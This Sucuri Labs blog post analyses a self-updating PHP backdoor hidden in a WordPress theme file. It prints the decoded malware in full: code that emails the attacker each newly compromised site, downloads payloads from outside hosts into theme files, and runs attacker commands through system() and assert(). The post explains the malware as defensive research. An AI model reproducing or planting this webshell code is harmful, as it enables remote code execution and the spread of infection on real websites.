• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
Labs Note

Simple self updating hacktool

September 26, 2017Pedro Peixoto

FacebookTwitterSubscribe

While working on a compromised website, it’s very common to encounter hacktools. Those are like the attackers’ swiss knife, allowing them to perform several tasks such as: DoS attacks, execute server level exploits and even simple filemanagers.

Sometime though, we find some very clever ones, such as this one infecting a WordPress website. It was able to download updated malware content from the internet and spread it to a new file.

The original code was hiding inside a Theme file:

wp-content/themes/THEME_NAME/framework/admin/framework-updates.php

The file content was obfuscated, as usual. Here’s a small portion of it:

>>> ${"x47x4cOx42Ax4cx53"}["xx70tx68x62x62ent"]="cx64x78";${"GLOx42x41Lx53"}["x73ex6fx70ch"]="x62x6bx61vx64ox6ee";${"x47x4cx4fx42Ax4cx53"}["x70x65xx6bx78x79"]="x6fx70x65x6e";

Once decoded, the real code can be separated into two sections.

The first part uses a .tmp (“temporary”) file stored into WordPress’ uploads directory and it is used to detect whether this server has been already compromised or not:

<?php
error_reporting(0);
ini_set("display_errors",0);
$string=__FILE__;
if(strtolower(substr(PHP_OS,0,3))=="win")
$os="win";
else
$os="nix";
if($os=="win"){
while((substr($string,-1)!="\"))
$string=substr_replace($string,"",-1);
$filename=$string."..\..x5c..\..x5cuploads\tmp.tmp";
}
else{
while((substr($string,-1)!="/"))
$string=substr_replace($string,"",-1);
$filename=$string."../../../../uploads/tmp.tmp";
}
if(file_exists($filename)){
}
else{
$from_set="sahifa511@".$_SERVER["SERVER_NAME"];
$to="themesrv1@commandandcontrol.infected";
$subject="Accepted";
$header="from: ".$from_set;
$message="Link : http://".$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]."rn";
$message.="Path : ".__file__;
$sentmail=@mail($to,$subject,$message,$header);
if($sentmail==true){
$open=fopen($filename,"w");
}
else{
};
}
?>

The code prepares the file path, adapting accordingly to the server’s OS. Once the file path is ready, it checks for its existence.

If the file already exists, then nothing happens (empty IF block above). Otherwise, the code notifies the attacker via email and writes the file to the disk, which acts as flag for future executions.

The second part the code shows the attack’s potential:

<?
if(isset($_POST["oldmtsfeatures"])){
$file=file_get_contents("http://infected.dom/newfile");
$open=fopen(getcwd()."/wp-mail-sample.php","w");
$yes=fwrite($open,"<?php $file ?>");
if($yes){
echo"<br>done";
}
else
echo"SomethingWentWrong";
if(isset($_POST["elf"])){
$elf=$_POST["elf"];
switch($elf){
CASE 1:{
$file=file_get_contents("http://files.hackingtruth.org/raw/0.txt");
$open=fopen($string."themefile1.php","w");
$yes=fwrite($open,"<?php $file ?>");
echo"1 executed";
break;
}
CASE 2:{
$file=file_get_contents($_POST["addr"]);
$open=fopen($string.$_POST["filewithext"],"w");
$yes=fwrite($open,"$file");
echo"2 executed";
break;
}
CASE 3:{
$cdx=$_POST["cdx"];
$bkavdone='system';
$bkavdone($cdx);
break;
}
CASE 4:{
call_user_func_array("assert", array($_REQUEST["comnd"]));
break;
}
}
}
}
?>

If the attacker posts any content on a “oldmtsfeatures” key, the actual hacktool is executed, and the code is able to spread the infection:

It downloads malware from a remote site and saves it to another file inside the theme’s folder: wp-mail-sample.php

The attacker will use the elf option to select what action the malware will perform.

Options 1 and 2 are yet another spreading tools, which downloads code from another URL, fixed or obtained via POST, and saves it as theme file. Again, the file name could be fixed (themefile1.php) or obtained via POST. Case 2 in particular is very clever, since the malware is able to overwrite itself, with an updated version of the hacktool.

Options 3 and 4 are the most destructive part of the code, since they perform Remote Code Execution. The attacker sends it command to be run via POST, and executes them using a regular system() call or via a more clever execution of PHP’s assert() function.

FacebookTwitterSubscribe

Categories: Sucuri Labs, Website Malware Infections, WordPress SecurityTags: Hacked Websites, Labs Note

About Pedro Peixoto

Pedro is a Security Analyst at Sucuri. Find him on Twitter at @pedrohp

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.